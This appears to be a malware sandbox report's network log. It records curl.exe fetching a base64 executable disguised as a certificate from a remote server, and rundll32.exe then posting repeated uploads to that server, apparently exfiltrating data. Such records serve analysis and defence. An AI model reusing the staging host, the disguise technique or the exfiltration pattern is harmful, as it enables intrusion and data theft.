                              Data Raw: 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0d 0a 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 45 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 0d 0a 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 43 4c 7a 71 43 56 7a 36 2f 4f 78 73 2b 76 7a 73 62 50 72 38 37 47 0d 0a 68 4e 66 4e 78 38 65 76 7a 73 61 45 31 38 76 48 48 4b 2f 4f 78 6f 54 58 79 73 66 65 72 38 37 47 7a 36 2f 4f 78 73 36 76 7a 73 59 4c 32 73 72 48 75 4b 2f 4f 78 6c 6a 78 7a 38 66 4e 72 38 37 47 0d 0a 44 53 34 7a 78 73 6d 76 7a 73 59 4e 4c 73 76 48 6c 61 2f 4f 78 67 30 75 79 73 66 64 72 38 37 47 44 53 37 4e 78 39 32 76 7a 73 61 45 31 [TRUNCATED]
                              Data Ascii: -----BEGIN CERTIFICATE-----TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACLzqCVz6/Oxs+vzsbPr87GhNfNx8evzsaE18vHHK/OxoTXysfer87Gz6/Oxs6vzsYL2srHuK/Oxljxz8fNr87GDS4zxsmvzsYNLsvHla/Oxg0uysfdr87GDS7Nx92vzsaE18/H3K/Oxs+vz8Y0r87GPC3Gx8ivzsY8Lc7Hzq/OxjwtMcbOr87GPC3Mx86vzsZSaWNoz6/OxgAAAAAAAAAAUEUAAGSGBwBiH5pmAAAAAAAAAADwACIgCwIOJwCOEAAAIAUAAAAAAPCXAgAAEAAAAAAAgAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAABYAAAQAAAAAAAACAGABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAACB3FADwCwAAEIMUANwAAAAA0BUA4AEAAADwFAA4wQAAAAAAAAAAAAAA4BUAEBMAABCfEwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0J0TAEABAAAAAAAAAAAAAACgEAB4BwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAB1jRAAABAAAACOEAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAQvoDAACgEAAA/AMAAJIQAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAHBJAAAAoBQAACQAAACOFAAAAAAAAAAAAAAAAABAAADALnBkYXRhAAA4wQAAAPAUAADCAAAAshQAAAAAAAAAAAAAAAAAQAAAQF9SREF [TRUNCATED]
                              Jul 22, 2024 15:57:47.926978111 CEST1236INHTTP/1.0 200 OK
                              Server: SimpleHTTP/0.6 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:57:47 GMT
                              Content-type: text/plain
                              Content-Length: 1941690
                              Last-Modified: Fri, 19 Jul 2024 08:16:47 GMT
                              Data Raw: 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0d 0a 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 45 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 0d 0a 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 43 4c 7a 71 43 56 7a 36 2f 4f 78 73 2b 76 7a 73 62 50 72 38 37 47 0d 0a 68 4e 66 4e 78 38 65 76 7a 73 61 45 31 38 76 48 48 4b 2f 4f 78 6f 54 58 79 73 66 65 72 38 37 47 7a 36 2f 4f 78 73 36 76 7a 73 59 4c 32 73 72 48 75 4b 2f 4f 78 6c 6a 78 7a 38 66 4e 72 38 37 47 0d 0a 44 53 34 7a 78 73 6d 76 7a 73 59 4e 4c 73 76 48 6c 61 2f 4f 78 67 30 75 79 73 66 64 72 38 37 47 44 53 37 4e 78 39 32 76 7a 73 61 45 31 [TRUNCATED]
                              Data Ascii: -----BEGIN CERTIFICATE-----TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACLzqCVz6/Oxs+vzsbPr87GhNfNx8evzsaE18vHHK/OxoTXysfer87Gz6/Oxs6vzsYL2srHuK/Oxljxz8fNr87GDS4zxsmvzsYNLsvHla/Oxg0uysfdr87GDS7Nx92vzsaE18/H3K/Oxs+vz8Y0r87GPC3Gx8ivzsY8Lc7Hzq/OxjwtMcbOr87GPC3Mx86vzsZSaWNoz6/OxgAAAAAAAAAAUEUAAGSGBwBiH5pmAAAAAAAAAADwACIgCwIOJwCOEAAAIAUAAAAAAPCXAgAAEAAAAAAAgAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAABYAAAQAAAAAAAACAGABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAACB3FADwCwAAEIMUANwAAAAA0BUA4AEAAADwFAA4wQAAAAAAAAAAAAAA4BUAEBMAABCfEwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0J0TAEABAAAAAAAAAAAAAACgEAB4BwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAB1jRAAABAAAACOEAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAQvoDAACgEAAA/AMAAJIQAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAHBJAAAAoBQAACQAAACOFAAAAAAAAAAAAAAAAABAAADALnBkYXRhAAA4wQAAAPAUAADCAAAAshQAAAAAAAAAAAAAAAAAQAAAQF9SREF [TRUNCATED]


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.649724172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:57:52.076809883 CEST175OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 763
                              Content-Type: multipart/form-data; boundary=------------------------f9fa7306880345da
                              Jul 22, 2024 15:57:53.008451939 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:57:52 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.649725172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:57:53.358400106 CEST178OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 160166
                              Content-Type: multipart/form-data; boundary=------------------------f13a1e66d9ac3858
                              Jul 22, 2024 15:57:55.009737968 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:57:54 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.649726172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:57:55.156630993 CEST178OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 106918
                              Content-Type: multipart/form-data; boundary=------------------------3db099609e8ee48c
                              Jul 22, 2024 15:57:56.888102055 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:57:56 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.649785172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:01.400501966 CEST201OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 5243310
                              Content-Type: multipart/form-data; boundary=------------------------f661165eccdedd9d
                              Expect: 100-continue
                              Jul 22, 2024 15:58:02.352619886 CEST25INHTTP/1.1 100 Continue
                              Jul 22, 2024 15:58:02.691077948 CEST25INHTTP/1.1 100 Continue
                              Jul 22, 2024 15:58:12.813688040 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:12 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.649787172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:12.852502108 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------2fe595d5319db200
                              Jul 22, 2024 15:58:14.099627972 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:13 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.649788172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:14.240947008 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------4b737e61e1b7e9bf
                              Jul 22, 2024 15:58:15.198400974 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:14 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.649791172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:15.259640932 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------4e35b57d9f58fc90
                              Jul 22, 2024 15:58:16.230422020 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:16 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.649792172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:16.271934986 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------815ab7d36e08e457
                              Jul 22, 2024 15:58:17.295510054 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:17 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.649796172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:17.336795092 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------a5d52e19e3fe200b
                              Jul 22, 2024 15:58:19.095040083 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:18 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.649799172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:19.144777060 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------ec3ba31dfe96d326
                              Jul 22, 2024 15:58:20.122091055 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:19 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.649802172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:20.170160055 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------f22aeea0bd5a0f8e
                              Jul 22, 2024 15:58:21.153264999 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:20 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.649803172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:21.187952042 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------d8bdcfc228d82f5a
                              Jul 22, 2024 15:58:22.142986059 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:21 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.649804172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:22.184228897 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------cfe9280e100efce1
                              Jul 22, 2024 15:58:23.149571896 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:22 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.649805172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:23.185118914 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------904a2babf6d2f7ac
                              Jul 22, 2024 15:58:24.139328003 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:23 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.649806172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:24.183013916 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------f49946b6384ac060
                              Jul 22, 2024 15:58:25.188642979 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:24 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.649807172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:25.223192930 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------b85ce3e308f45060
                              Jul 22, 2024 15:58:26.179584026 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:25 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.649808172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:26.214215040 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------614e08f55f0c2cfe
                              Jul 22, 2024 15:58:27.172560930 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:26 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.649809172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:27.223325014 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------bea6c7b09692f28c
                              Jul 22, 2024 15:58:28.192996979 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:27 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.649810172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:28.223781109 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------23dd402f4b4a39c5
                              Jul 22, 2024 15:58:29.393204927 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:29 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.649811172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:29.415345907 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------e591042c4603c21a
                              Jul 22, 2024 15:58:30.418589115 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:30 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.649812172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:30.457218885 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------a0f76a6adccf351c
                              Jul 22, 2024 15:58:31.408162117 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:31 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.649813172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:31.429837942 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------c4d90e433018b142
                              Jul 22, 2024 15:58:32.421782017 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:32 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.649814172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:32.452909946 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------d2ca679a5d8f632b
                              Jul 22, 2024 16:03:16.170886040 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:15 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.649195172.104.160.12680998092C:\Users\user\AppData\Local\Temp\curl.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:44.539683104 CEST96OUTGET /payload2.txt HTTP/1.1
                              Host: 172.104.160.126:8099
                              User-Agent: curl/7.83.1
                              Accept: */*
                              Jul 22, 2024 15:58:45.442208052 CEST192INHTTP/1.0 200 OK
                              Server: SimpleHTTP/0.6 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:45 GMT
                              Content-type: text/plain
                              Content-Length: 1941690
                              Last-Modified: Fri, 19 Jul 2024 08:16:47 GMT


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.649209172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:49.030189991 CEST175OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 763
                              Content-Type: multipart/form-data; boundary=------------------------72fb5c35750f8204
                              Jul 22, 2024 15:58:50.140399933 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:49 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.649210172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:50.228224039 CEST178OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 160166
                              Content-Type: multipart/form-data; boundary=------------------------43289e4b14c04ac7
                              Jul 22, 2024 15:58:51.995739937 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:51 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.649211172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:52.073549032 CEST178OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 106918
                              Content-Type: multipart/form-data; boundary=------------------------71ca7f7e591272d4
                              Jul 22, 2024 15:58:53.781343937 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:58:53 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.649212172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:58:56.906732082 CEST201OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 5243310
                              Content-Type: multipart/form-data; boundary=------------------------727b88163de31621
                              Expect: 100-continue
                              Jul 22, 2024 15:58:57.841603041 CEST25INHTTP/1.1 100 Continue
                              Jul 22, 2024 15:58:58.133002043 CEST25INHTTP/1.1 100 Continue
                              Jul 22, 2024 15:59:08.320777893 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:08 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.649214172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:08.372284889 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------528cb38273400043
                              Jul 22, 2024 15:59:09.587399006 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:09 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.649215172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:09.633794069 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------6ceab3228cef8607
                              Jul 22, 2024 15:59:10.559612036 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:10 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.649216172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:10.584906101 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------a158dee7d748d662
                              Jul 22, 2024 15:59:11.614016056 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:11 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.649218172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:11.675931931 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------5e2d7668485dfa80
                              Jul 22, 2024 15:59:12.636787891 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:12 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.649219172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:12.660794020 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------0f7ba0280905d0a7
                              Jul 22, 2024 15:59:13.655487061 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:13 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


